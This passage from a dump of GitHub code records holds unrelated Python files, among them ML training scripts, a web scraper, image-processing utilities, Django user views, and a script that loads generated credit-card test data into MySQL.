basic_summarizer.init_model(preprocessor=self.preprocessor,\n vectorizer=self.vectorizer,\n embedding_weights_encoder=None,\n embedding_weights_decoder=None)\n loss = 0\n train_step = basic_summarizer.new_train_step(loss_function=self.loss_func,\n batch_size=2)\n for e in range(0, 10):\n for source_seq, target_seq in self.dataset.take(-1):\n loss = train_step(source_seq, target_seq)\n\n self.assertAlmostEqual(1.5850255489349365, float(loss), 5)\n output = basic_summarizer.predict_vectors('a c', '')\n expected_first_logits = np.array([-0.00621 , 0.007277, 0.015851, -0.034298, 0.044253])\n np.testing.assert_allclose(expected_first_logits, output['logits'][0], atol=1e-6)\n self.assertEqual(' a c ', output['preprocessed_text'][0])\n self.assertEqual('', output['predicted_text'])\n\n def test_training_summarizer_transformer(self):\n transformer_summarizer = TransformerSummarizer(num_heads=1,\n num_layers=1,\n feed_forward_dim=20,\n embedding_size=10,\n dropout_rate=0,\n max_prediction_len=3)\n transformer_summarizer.init_model(preprocessor=self.preprocessor,\n vectorizer=self.vectorizer,\n embedding_weights_encoder=None,\n embedding_weights_decoder=None)\n loss_transformer = 0\n train_step = transformer_summarizer.new_train_step(loss_function=self.loss_func,\n batch_size=2)\n for e in range(0, 10):\n for source_seq, target_seq in self.dataset.take(-1):\n loss_transformer = train_step(source_seq, target_seq)\n print(str(loss_transformer))\n\n self.assertAlmostEqual(1.3421446084976196, float(loss_transformer), 5)\n output_transformer = transformer_summarizer.predict_vectors('a c', '')\n expected_first_logits = np.array([-0.514366, 1.416978, -0.679771, -0.488442, -0.022602])\n np.testing.assert_allclose(expected_first_logits, output_transformer['logits'][0], atol=1e-6)\n self.assertEqual(' a c ', output_transformer['preprocessed_text'][0])\n self.assertEqual('c c c', output_transformer['predicted_text'])\n","repo_name":"as-ideas/headliner","sub_path":"tests/test_training.py","file_name":"test_training.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","stars":231,"dataset":"github-code","pt":"21"} +{"seq_id":"40427959288","text":"import cv2, pydicom, nrrd, os, itertools\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom numpy import asarray\r\nfrom matplotlib import pyplot as plt\r\n\r\nroot = 'D:/renalUS/data/'\r\n\r\ndef path(directory):\r\n dcm_list, nrrd_list = [], []\r\n IDs = os.listdir(directory)\r\n for ID in IDs:\r\n files = os.listdir(directory + ID)\r\n for file in files:\r\n f_name, file_ext = os.path.splitext (file)\r\n if file_ext == '.nrrd':\r\n path_nrrd = directory + ID + '/' + file\r\n name_dcm = f_name [5:] +'.dcm'\r\n path_dcm = directory + ID + '/' + name_dcm\r\n nrrd_list.append (path_nrrd)\r\n dcm_list.append (path_dcm)\r\n return dcm_list, nrrd_list\r\n\r\n\r\ndef segmentation(path_dcm, path_nrrd):\r\n # convert dcm --> array --> RGB_jpg --> gray_jpg --> array\r\n dcm_to_array = pydicom.dcmread(path_dcm)\r\n array = dcm_to_array.pixel_array.astype(float)\r\n array = (np.maximum(array, 0)/array.max()) * 255.0\r\n array = np.uint8(array)\r\n jpg = Image.fromarray(array)\r\n jpg.save('D:/l-0.jpg')\r\n jpg = cv2.imread ('D:/l-0.jpg')\r\n gray_jpg = cv2.cvtColor(jpg, cv2.COLOR_BGR2GRAY)\r\n array_2D = asarray (gray_jpg)\r\n \r\n # nrrd --> array --> transposing\r\n mask_array, header = nrrd.read(path_nrrd)\r\n mask_array = np.reshape (mask_array, (800, 600))\r\n mask_array = np.transpose(mask_array)\r\n \r\n # apply nrrd to dcm in array type\r\n ROI = np.multiply(mask_array, array_2D)\r\n \r\n # show the segmentation\r\n segmented = ROI/ ROI.max() * 255.0\r\n plt.imshow(segmented, interpolation = 'none')\r\n plt.show()\r\n return segmented\r\n\r\ncol =[]\r\nfor i in range (800):\r\n col.append('c' + str(i+1))\r\n \r\ndef barplot (row_1D_array):\r\n sum = np.sum(row_1D_array, dtype = np.float32)\r\n print (sum)\r\n plt.bar (col, row_1D_array, color ='maroon')\r\n #plt.ylim((0, 255))\r\n plt.show()\r\n\r\ndef boxplot (array_2D):\r\n array_1D =[]\r\n for i in range (600):\r\n for j in range (800):\r\n array_1D.append(array_2D[i][j])\r\n plt.figure(figsize=(10, 7))\r\n plt.boxplot(array_1D)\r\n plt.show()\r\n return array_1D\r\n \r\ndef exp_value (array_2D):\r\n exp = np.multiply(array_2D, array_2D)\r\n return exp\r\n\r\ndef delete_markers (ROI):\r\n _, _, mean = overview(ROI)\r\n for i in range (600):\r\n for j in range (800):\r\n if ROI[i][j] >= 230:\r\n ROI[i][j] = mean\r\n return ROI\r\ndef overview (ROI):\r\n num_pixel = 0\r\n total_value_pixel = 0\r\n for i in range (600):\r\n for j in range (800):\r\n if ROI[i][j] > 0:\r\n num_pixel += 1\r\n total_value_pixel += ROI[i][j]\r\n mean_value_pixel = total_value_pixel/num_pixel\r\n return num_pixel, total_value_pixel, mean_value_pixel\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"binhyc11/Renal-US-images","sub_path":"plot_segmentation.py","file_name":"plot_segmentation.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9639553435","text":"import requests\nimport pandas as pd\n\nfrom bs4 import BeautifulSoup\n\ndef remap_player(player):\n mapping = {\n 'Stephane Wilfried Singo': 'Wilfried Stephane Singo',\n 'Destiny Udogie': 'Iyenoma Destiny Udogie',\n 'Matias Vina': 'Matias Viña',\n 'Anderson Felipe': 'Felipe Anderson',\n 'Nicolò Zaniolo': 'Nicolo Zaniolo',\n 'Alvaro Morata': 'Álvaro Morata',\n 'Ledesma Rodriguez Pedro': 'Pedro',\n 'Diego Godin': 'Diego Godín',\n 'Theo Hernandez': 'Theo Hernández',\n 'Peter Stojanovic': 'Petar Stojanovic',\n 'Marten Roon De': 'Marten de Roon',\n 'Lobo Sandro Alex': 'Alex Sandro',\n 'Matthijs Ligt De': 'Matthijs de Ligt',\n 'Davide Faraoni': 'Marco Faraoni',\n 'Alvaro Odriozola': 'Álvaro Odriozola',\n 'Jens Larsen Stryger': 'Jens Stryger Larsen',\n 'Ruslan Malinovskyi': 'Ruslan Malinovskiy',\n 'Nahitan Nandez': 'Nahitan Nández',\n 'Oliver Giroud': 'Olivier Giroud',\n 'Pepe Reina': 'José Reina',\n 'Lorenzo Silvestri De': 'Lorenzo De Silvestri',\n 'Konstantinos Manolas': 'Kostas Manolas',\n 'Aleksej Miranchuk': 'Aleksey Miranchuk',\n 'Duvan Zapata': 'Duván Zapata',\n 'Arnor Sigurdsson': 'Arnór Sigurdsson',\n ' Hamed Traorè': 'Hamed Junior Traore',\n 'Galvao Pedro Joao': 'João Pedro',\n 'Rafael Leao': 'Rafael Leão',\n 'Nwankwo Tochukwu Simeon': 'Simy',\n 'Jaime Cuadrado': 'Juan Cuadrado',\n 'Giovanni Lorenzo Di': 'Giovanni Di Lorenzo',\n 'Leonardo Spinazzola': 'Leonardo Spinazzola',\n 'Maria Josè Callejon': 'José Callejón',\n 'Franck Kessiè': 'Franck Kessié',\n 'Alconchel Alberto Luis': 'Luis Alberto',\n 'Nicolas Gonzalez': 'Nicolás González',\n 'Lautaro Martinez': 'Lautaro Martínez',\n \"M'Bala Nzola\": 'M'Bala Nzola',\n 'Silva da Luiz Danilo': 'Danilo',\n 'Stefan Vrij De': 'Stefan de Vrij',\n 'Joaquin Correa': 'Joaquín Correa',\n 'Patricio Rui': 'Rui Patrício',\n 'Berat Djimsiti': 'Berat Gjimshiti',\n 'Roger Ibanez': 'Ibañez',\n 'Ramos Felipe Luiz': 'Luiz Felipe',\n 'Duarte Rui Mario': 'Mário Rui',\n 'Fabian Ruiz': 'Fabián',\n 'Frank Ribery': 'Franck Ribéry'\n }\n \n if player in mapping:\n return mapping[player]\n else:\n return player\n \ndef remap_team(team):\n mapping = {\n 'Milan': 'AC Milan'\n }\n \n if team in mapping:\n return mapping[team]\n else:\n return team\n\ndef get_league_teams(league_name):\n \n url = 'https://leghe.fantacalcio.it/{}/area-gioco/rose'.format(league_name)\n \n page = requests.get(url)\n soup = BeautifulSoup(page.text, 'html.parser')\n \n league_data = []\n\n team_names = soup.find_all(class_='media-heading')\n rows = soup.find_all(class_='smart-table table-striped fixed table no-margin has-subheader')\n for row, team_name in zip(rows, team_names):\n team_name = team_name.text\n\n roles = row.find_all(class_='cell-text cell-role cell-primary x1 smart-x2 mantra-x3 free-player-hidden')\n players = row.find_all(class_='player-link')\n\n for role, player in zip(roles, players):\n role = role.text\n\n name_page = requests.get(player['href'])\n soup_name = BeautifulSoup(name_page.text, 'html.parser')\n\n box = soup_name.find(class_='stickem-container')\n name = box.find(class_='img-responsive')['title'].split(' ')\n name.reverse()\n name = ' '.join(name)\n image = box.find(class_='img-responsive')['src']\n squad = box.find_all(class_='col-lg-6 col-md-6 col-sm-12 col-xs-12')[4].text.split(' ')[1]\n\n league_data.append([team_name, role, name, squad, image])\n\n league = pd.DataFrame(data=league_data, columns=['fanta_team', 'role', 'player', 'team', 'image'])\n league['player'] = league['player'].apply(lambda x: remap_player(x))\n league['team'] = league['team'].apply(lambda x: remap_team(x))\n league.to_csv('data/leghe_fantacalcio/leagues/{}.csv'.format(league_name), index=False)\n league.head()","repo_name":"Zatfer17/serie-a-lineups","sub_path":"modules/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36651995523","text":"import numpy as np\nimport os\nimport scipy.misc\nfrom scipy import ndimage\nimport scipy.ndimage\nfrom random import choice, randint\nfrom scipy.ndimage.interpolation import zoom\nnp.random.seed(123)\n\n\ndef augment_image(image):\n\tswitch = randint(0, 3)\n\n\tif switch == 0:\n\t\tblurred_image = ndimage.uniform_filter(image, size=(7, 7, 1))\n\t\t#scipy.misc.imsave(os.path.join('./', 'image_trans/blurred.jpg'), blurred_image)\n\t\treturn blurred_image\n\telif switch == 1:\n\t\tzoomed_image = scipy.ndimage.filters.gaussian_filter(image, 1.5)\n\t\t#scipy.misc.imsave(os.path.join('./', 'image_trans/zoomed.jpg'), zoomed_image)\n\t\treturn zoomed_image\n\telif switch == 2:\n\t\tflipped_image = np.fliplr(image)\n\t\t#scipy.misc.imsave(os.path.join('./', 'image_trans/flipped.jpg'), flipped_image)\n\t\treturn flipped_image\n\telif switch == 3:\n\t\trotation_angle = choice([randint(-70, -20), randint(20, 70)])\n\t\trotated_image = scipy.ndimage.interpolation.rotate(image, rotation_angle, mode='reflect', reshape=False)\n\t\t#scipy.misc.imsave(os.path.join('./', 'image_trans/rotated.jpg'), rotated_image)\n\t\treturn rotated_image\n\telse:\n\t\tblurred_image = ndimage.uniform_filter(image, size=(7, 7, 1))\n\t\treturn blurred_image\n\n\t# elif switch == 4:\n\t# \tshifted_amount = choice([randint(5.0, 13.0)])\n\t# \tshifted_image = scipy.ndimage.interpolation.shift(image, shifted_amount, mode='reflect')\n\t# \tscipy.misc.imsave(os.path.join('./', 'image_trans/rotated.jpg'), shifted_image)\n\n\nif __name__ == \"__main__\":\n\tparent_dir = '../../data/images/train/a/abbey/'\n\tim_name = '00000004.jpg'\n\timage_path = os.path.join(parent_dir, im_name)\n\timage = scipy.misc.imread(image_path)\n\taug_img = augment_image(image)\n# scipy.misc.imshow(image)\n\n","repo_name":"nischal225/miniplaces","sub_path":"im_aug.py","file_name":"im_aug.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38953344324","text":"#!/usr/bin/python3\n\nimport re\n\nquestions = {\n\t'is_pirate':\"Blimey! Ye landlubber still be learnin' the ropes! Every good talk starts with a hearty \\\"Arrrgh!\\\"\",\n\t'which_side':\"Good to be seein' you back.\\nDo you be lookin' to give(1) or get(2) help today?\"\n}\n\nresponses = {\n\t'is_pirate':(\n\t\t\t('a[ar]+r', True), # A proper pirate responds \"Arrrgh!\" or some variation thereof\n\t\t\t('.*', None),\n\t\t),\n\t'which_side':(\n\t\t\t('give','pirate'),\n\t\t\t('1', \t'pirate'),\n\t\t\t('get', 'victim'),\n\t\t\t('2', \t'victim'),\n\t\t\t('recieve', 'victim'),\n\t\t),\n}\n\nclass Session(object):\n\t\"\"\"Represents a user session\"\"\"\n\tqueriesProcessed = 0\n\thasOpenedWell = False\n\n\tknownData = {}\n\n\tactiveQuestion = 'is_pirate'\n\n\tdef __init__(self, name):\n\t\tsuper(Session, self).__init__()\n\t\tself.name = name\n\n\n\tdef handleQuery(self, request):\n\t\tself.queriesProcessed += 1\n\n\t\tif self.activeQuestion:\n\t\t\ttrans = self.interpretResponse(request)\n\t\t\tif trans == None:\n\t\t\t\t# We couldn't (or refused to) parse the response\n\t\t\t\treturn self.askData(self.activeQuestion)\n\n\t\tif 'is_pirate' not in self.knownData:\n\t\t\treturn self.askData('is_pirate')\n\n\t\tif 'which_side' not in self.knownData:\n\t\t\treturn self.askData('which_side')\n\n\t\treturn \"This be the end of the demo, you {}.\".format(self.knownData['which_side'])\n\n\tdef interpretResponse(self, request):\n\t\tl = responses[self.activeQuestion]\n\t\tfor patt, val in l:\n\t\t\tif re.search(patt, request.lower()):\n\n\t\t\t\tif val is not None:\n\t\t\t\t\tprint('learned {}:{}'.format(self.activeQuestion, val))\n\n\t\t\t\t\tself.knownData[self.activeQuestion] = val\n\t\t\t\t\tself.activeQuestion = None\n\n\t\t\t\treturn val\n\t\treturn None\n\n\tdef askData(self, data):\n\t\tif data in self.knownData:\n\t\t\tprint(\"Warning: {} is already known about user {}\".format(data, self.name))\n\t\tself.activeQuestion = data\n\n\t\treturn questions[data]\n\n\t\t\n\ndef main():\n\tsession = Session('testuser')\n\twhile True:\n\t\trequest = input('---> ')\n\n\t\tif not request:\n\t\t\tbreak\n\n\t\tresponse = session.handleQuery(request)\n\n\t\tif response:\n\t\t\tprint(\"\\n\"+response)\n\t\telse:\n\t\t\treturn\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"HALtheWise/pirates","sub_path":"text_handler/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37838769643","text":"#!/usr/bin/env python3\n'''\nAuthor: Jason Ostrom\nDescription: This script parses the json files created from Credit Card Generator (http://ccardgenerator.com/).\nThen inserts them into a MySQL DB\n\n'''\n\nimport json\nimport pymysql\nimport datetime\n\nfiles = ['cc_data/visa.json',\n\t'cc_data/mastercard.json',\n\t'cc_data/amex.json',\n 'cc_data/discover.json'\n]\n\ndb = pymysql.Connect(\"localhost\", \"\", \"\", \"\" )\n\ndef insert_sql(vid, vnetwork, vcardnumber, vname, vaddress, vcountry, vcvv, vexp, vuser_id, vcreated_at, vupdated_at):\n\n insert_stmt = (\n \"INSERT INTO creditcards (id, network, cardnumber, name, address, country, cvv, exp, user_id, created_at, updated_at) \"\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n)\n\n data = (vid, vnetwork, vcardnumber, vname, vaddress, vcountry, vcvv, vexp, vuser_id, vcreated_at, vupdated_at)\n\n try:\n with db.cursor() as cursor:\n retval = cursor.execute(insert_stmt, data)\n #print (\"Completed!: %s\" % retval)\n db.commit()\n finally:\n None\n\nindex = 1 \nfor file in files:\n\n with open(file, 'r') as f:\n data = f.read()\n\n string = data.replace(u'\\xa0', u' ')\n\n obj = json.loads(string)\n\n for i in obj:\n\n ##def insert_sql(vid, vnetwork, vcardnumber, vname, vaddress, vcountry, vcvv, vexp, vuser_id, vcreated_at, vupdated_at):\n network = i['CreditCard']['IssuingNetwork'] \n cardnumber = i['CreditCard']['CardNumber'] \n name = i['CreditCard']['Name'] \n address = i['CreditCard']['Address'] \n country = i['CreditCard']['Country'] \n cvv = i['CreditCard']['CVV'] \n exp = i['CreditCard']['Exp'] \n insert_sql(index, network, cardnumber, name, address, country, cvv, exp, 1, datetime.date(2012, 3, 23), datetime.date(2012, 3, 23))\n index += 1\n\nprint (\"Counter: %d\" % index)\ndb.close()\n","repo_name":"iknowjason/hammer","sub_path":"python_scripts/gen_creditdata.py","file_name":"gen_creditdata.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"8008708659","text":"import unittest\nfrom parameterized import parameterized\n\nfrom src.array.even_number_of_digits import EvenNumberOfDigits\n\n\nclass EvenNumberOfDigitsTest(unittest.TestCase):\n\n @parameterized.expand([\n ([0], 0),\n ([1771], 1),\n ([1772], 1),\n ([12, 345, 2, 6, 7896], 2),\n ([555, 901, 482, 1771], 1)\n ])\n def test_actual_return_against_expected(self, data, expected):\n actual = EvenNumberOfDigits().find_numbers(data)\n self.assertEqual(actual, expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"msorkhpar/leetcode-learning-cards","sub_path":"Python/test/array/test_even_number_of_digits.py","file_name":"test_even_number_of_digits.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"19955531275","text":"#In this file we will load the data and train the model\nimport keras\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom keras import backend as K\nimport matplotlib.pyplot as plt\n\nlabels = [\n \"red\",\n \"green\",\n \"blue\",\n \"orange\",\n \"yellow\",\n \"pink\",\n \"purple\",\n \"brown\",\n \"grey\",\n \"black\"\n]\n\n#Hyper Parameters\nNUM_EPOCHS = 500\nLEARNING_RATE = 0.2\nNUM_HIDDEN_UNITS = 16\nNUM_TRAIN = 5500\nVALIDATION_SPLIT = 0.1\n\n\ndef get_data_from_file():\n data = []\n filepath = \"clean_data.txt\"\n if not os.path.isfile(filepath):\n print(\"File path {} does not exist. Exiting...\".format(filepath))\n sys.exit()\n with open(filepath) as fp:\n entry = []\n for line in fp:\n word = line.split(\",\")\n r = word[0]\n g = word[1]\n b = word[2]\n label = word[3].rstrip(\"\\n\")\n entry = [r, g, b, label]\n data.append(entry)\n return data\n\ndef prepare_data(data):\n np.random.shuffle(data)\n data = np.array(data)\n\n #seperate input values\n xs = data[:,0:3]\n xs = np.divide(xs.astype(np.float), 255) #normalize\n\n #seperate label values\n ys = data[:, 3]\n ys = np.vectorize(labels.index)(ys)\n\n #seperate training data\n XTrain = xs[0:NUM_TRAIN,:]\n YTrain = ys[0:NUM_TRAIN]\n YTrain = keras.backend.one_hot(YTrain, 10)\n\n #sepearate testing data\n XTest = xs[NUM_TRAIN:, :]\n YTest = ys[NUM_TRAIN:]\n YTest = keras.backend.one_hot(YTest, 10)\n\n return XTrain, YTrain, XTest, YTest\n\ndef buildModel():\n model = keras.Sequential()\n model.add(keras.layers.Dense(units=NUM_HIDDEN_UNITS, activation='sigmoid', input_shape=[3]))\n model.add(keras.layers.Dense(units=10, activation='softmax'))\n opt = keras.optimizers.SGD(learning_rate=0.2)\n model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy', keras.metrics.Precision(), keras.metrics.Recall()])\n return model\n\ndef saveModelAsTFLite(model):\n converter = tf.lite.TFLiteConverter.from_keras_model(model)\n converter.post_training_quantize = True\n tflite_buffer = converter.convert()\n open( 'android/model.tflite' , 'wb' ).write( tflite_buffer )\n\ndef plotTrainingHistory(history):\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.show()\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.show()\n\ndef calculateF1(precision, recall):\n return 2 * ((precision * recall)/ (precision + recall))\n\ndef displayResults(results):\n loss = results[0]\n accuracy = results[1]\n precision = results[2]\n recall = results[3]\n f1_score = calculateF1(precision, recall)\n print('\\n\\nResults from evaluating on training data: \\n')\n print('Loss', round(loss, 2))\n print('Accuracy', round(accuracy, 2))\n print('Precision: ', round(precision, 2))\n print('Recall: ', round(recall, 2))\n print('F1 Score: ', round(f1_score, 2))\n print('\\n\\n')\n\n\ndef main():\n data = get_data_from_file()\n XTrain, YTrain, XTest, YTest = prepare_data(data)\n model = buildModel()\n history = model.fit(x=XTrain,y=YTrain, epochs=NUM_EPOCHS, validation_split=VALIDATION_SPLIT) #train model\n plotTrainingHistory(history)\n displayResults(model.evaluate(x=XTrain, y=YTrain))\n displayResults(model.evaluate(x=XTest, y=YTest))\n\n\nmain()\n","repo_name":"cgmoffitt/color-classifier","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74206108214","text":"import numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\n\nclass NB:\n def fit(self, X, y):\n num_samples, num_features = X.shape\n self._classes = np.unique(y) \n num_classes = len(self._classes)\n\n self._mean = np.zeros((num_classes, num_features), dtype=np.float64)\n self._var = np.zeros((num_classes, num_features), dtype=np.float64)\n self._priors = np.zeros(num_classes, dtype=np.float64)\n\n for c in self._classes:\n X_c = X[c == y]\n self._mean[c, :] = X_c.mean(axis=0)\n self._var[c, :] = X_c.var(axis=0)\n self._priors[c] = X_c.shape[0] / float(num_samples)\n\n def predict(self, X):\n return [self._predict(x) for x in X]\n\n def _predict(self, x):\n posteriors = []\n\n for i, c in enumerate(self._classes):\n prior = np.log(self._priors[i])\n class_conditional = np.sum(np.log(self._pdf(i, x)))\n posterior = prior + class_conditional\n posteriors.append(posterior)\n\n return self._classes[np.argmax(posteriors)]\n\n def _pdf(self, class_i, x):\n return 1 / np.sqrt(2 * np.pi * self._var[class_i]) * np.exp(-(x - self._mean[class_i]) ** 2 / (2 * self._var[class_i]))\n\ndef accuracy(y_true, y_pred):\n return np.sum(y_pred == y_true) / len(y_true)\n","repo_name":"victorlisman/BasicML","sub_path":"Naive Bayes/NB.py","file_name":"NB.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16054848442","text":"import subprocess\nimport re\n\n\ndef run(cmd, callback=None):\n curr = 0\n total = None\n p = subprocess.Popen(cmd, stderr=subprocess.PIPE, bufsize=1, universal_newlines=True)\n for line in p.stderr:\n m = re.search(r'Duration: (\\d+([:.]\\d+)+)', line)\n if m:\n total = 1 + time_to_secs(m.group(1))\n if callback is not None:\n callback(curr, total)\n\n m = re.search('time=(\\d+([:.]\\d+)+)', line)\n if m:\n curr = time_to_secs(m.group(1))\n if callback is not None:\n callback(curr, total)\n\n p.communicate()\n\n\nregex = re.compile(r'(?P\\d+):'\n r'(?P\\d+):'\n r'(?P\\d+\\.\\d+)')\n\n\ndef time_to_secs(time):\n m = re.match(regex, time)\n parts = m.groupdict()\n return int(parts['hours'])*3600 + int(parts['min'])*60 + float(parts['sec'])\n","repo_name":"ashutosh108/video-scripts","sub_path":"ffmpegrunner.py","file_name":"ffmpegrunner.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42128916312","text":"import uuid\nfrom django.contrib.auth import authenticate, login as auth_login\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom app.models import AuthUser, AuthUserGroups, AuthGroup\nfrom django.db import transaction\nfrom django.contrib.auth.hashers import make_password\n\n\ndef list_users(request):\n if request.method == \"POST\":\n check_username = AuthUser.objects.filter(username=request.POST.get('username'))\n check_email = AuthUser.objects.filter(email=request.POST.get('email'))\n if check_email:\n return JsonResponse({'error': True, 'msg': \"Email '{}' is already existed.\".format(request.POST.get('email'))})\n else:\n if not check_username:\n with transaction.atomic():\n user = AuthUser(\n first_name=request.POST.get('first_name'),\n middle_name=request.POST.get('middle_name'),\n last_name=request.POST.get('last_name'),\n email=request.POST.get('email'),\n username=request.POST.get('username'),\n password=make_password(request.POST.get('password')),\n is_superuser=True if request.POST.get('is_superuser') else False,\n is_staff=True if request.POST.get('is_staff') else False,\n is_active=1,\n updated_by_id=request.user.id\n )\n user.save()\n\n AuthUserGroups.objects.create(\n user_id=user.id,\n group_id=request.POST.get('group'),\n )\n return JsonResponse({'data': 'success', 'msg': \"New user '{}' has been added successfully.\".format(request.POST.get('username'))})\n return JsonResponse({'error': True, 'msg': 'Internal Error. An uncaught exception was raised.'})\n return JsonResponse({'error': True, 'msg': \"User '{}' is already existed.\".format(request.POST.get('username'))})\n\n\n\n context = {\n 'at_group': AuthGroup.objects.all(),\n }\n return render(request, 'users/list_users.html', context)\n\n\ndef edit(request,pk):\n if request.method == \"POST\":\n AuthUser.objects.filter(id=pk).update(\n first_name=request.POST.get('first_name'),\n middle_name=request.POST.get('middle_name'),\n last_name=request.POST.get('last_name'),\n )\n full_name = request.POST.get('first_name') + \" \" + request.POST.get('middle_name') + \" \" + request.POST.get('last_name')\n print(full_name)\n return JsonResponse({'data': 'success', 'msg': \"Your new Name '{}' has been updated.\".format(full_name)})\n context = {\n 'user': AuthUser.objects.filter(id=pk).first(),\n 'at_group': AuthGroup.objects.all(),\n 'user_group': AuthUserGroups.objects.filter(user_id=pk).first(),\n }\n return render(request, 'users/edit_users.html', context)","repo_name":"allennohesi/Info_kiosk","sub_path":"app/user_registration/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16116788388","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 8 11:20:29 2018\n\n@author: Sirius\n\ntrain tiny imagenet on dataset representation\nTrick:\n1. 只要模型能过拟合,基本都可以调整到好的结果\n2. SGD的loss虽然可能不好看,波动率可能也大,但是最后的收敛效果可能比好\n3. 从头开始训练时,不需要加BN, dropout,weight_decay等技巧,一个一个加\n4. 输入的图像数据需要进行归一化(减均值除以方差)\n\n\n需要进行的任务:\n1. 加上weight decay 进行计算\n2. 改变优化算法rmsprop\n3. 迁移学习,将原来图像的分辨率增加,用pre-trained模型进行计算\n4. 保留最优的20个ckpt,对模型进行ensemble\n5. BN中的 \n\n增加:\n1. 按照epoch进行递减\n\"\"\"\n\nfrom inceptionV3 import *\nfrom metrics import *\nfrom losses import *\nfrom input_pipe_aug import *\nfrom datetime import datetime\nimport numpy as np\nimport os\nimport shutil\nimport glob\nimport time\n\n\n\nclass TrainConfig(object):\n \"\"\"Training configuration\"\"\"\n batch_size = 64\n num_epochs = 100 \n \n # 测试用\n summary_interval = 250\n eval_interval = 2000 # must be integer multiple of summary_interval\n \n lr = 0.001 # tiny imagenet: decayed by 0.9 at every epoch \n reg = 0.08\n\n momentum = 0.9\n model_name = 'inception_v3'\n config_name = 'inception_v3_2'\n continue_train = False\n model = staticmethod(globals()[model_name]) # gets model by name\n\ndef options(config):\n # sirius: log and checkpoints under same directory folder\n # import os\n # from datetime import datetime\n\n now = datetime.now().strftime(\"%m%d%H%M\")\n logdir = \"run-{}/\".format(now) # log directory name\n\n model_directory = os.path.join(config.model_name, config.config_name)\n\n ckpt_path = os.path.join(model_directory, 'checkpoints')\n log_path = os.path.join(model_directory, 'logs', logdir)\n checkpoint = None\n \n if not os.path.isdir(model_directory): # if log directory not exists, create a new one\n os.makedirs(model_directory)\n return ckpt_path, log_path, checkpoint\n else:\n if not config.continue_train:\n return ckpt_path, log_path, checkpoint\n else:\n checkpoint = tf.train.latest_checkpoint(ckpt_path)\n return ckpt_path, log_path, checkpoint\n\nclass TrainControl(object):\n\n def __init__(self, lr, step):\n self.val_accs = []\n self.val_accs_5 = []\n \n self.lr = lr\n self.num_lr_updates = 0\n self.lr_factor = 1/10\n self.step = step # step\n\n def add_val_acc(self, val_accs):\n self.val_accs.append(val_accs)\n\n def add_val_acc_5(self, val_accs_5):\n self.val_accs_5.append(val_accs_5)\n\n def update_lr(self, sess, step):\n print('Inside update_lr. self.lr, step ', sess.run(self.lr), step)\n # sirius: 不能整除, 由于step一般都不是整数\n if step % LR_CHANGE_STEP == 0: # Note: 由于step%2000==0进入这里,这里选取的数字一定是2000的倍数\n old_lr = sess.run(self.lr)\n self.lr.load(old_lr * self.lr_factor)\n print('========================================')\n print('learning rate updates at step', step) \n print('current learning', sess.run(self.lr))\n \ndef model(images, labels, config, is_training, reuse = None):\n \n logits = config.model(images, is_training) # sirius: 只需要給模型傳入iamges和is_training\n softmax_smooth_ce_loss(logits, labels)\n acc, acc_5 = accuracy(logits, labels)\n # print('Inside train_tiny_inception, model, tf.get_collection(tf.GraphKeys.LOSSES)', tf.get_collection(tf.GraphKeys.LOSSES))\n # print('Inside train_tiny_inception, model, tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)', tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))\n total_loss = tf.add_n(tf.get_collection(tf.GraphKeys.LOSSES), name='total_loss')\n '''\n total_loss += tf.add_n(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES),\n name='total_loss') * config.reg\n for l2 in tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES):\n name = 'l2_loss_' + l2.name.split('/')[0]\n tf.summary.histogram(name, l2)\n '''\n\n return total_loss, acc, acc_5\n\n\ndef optimizer(loss, config):\n \"\"\"Add training operation, global_step and learning rate variable to Graph\n\n Args:\n loss: model loss tensor\n config: training configuration object\n\n Returns:\n 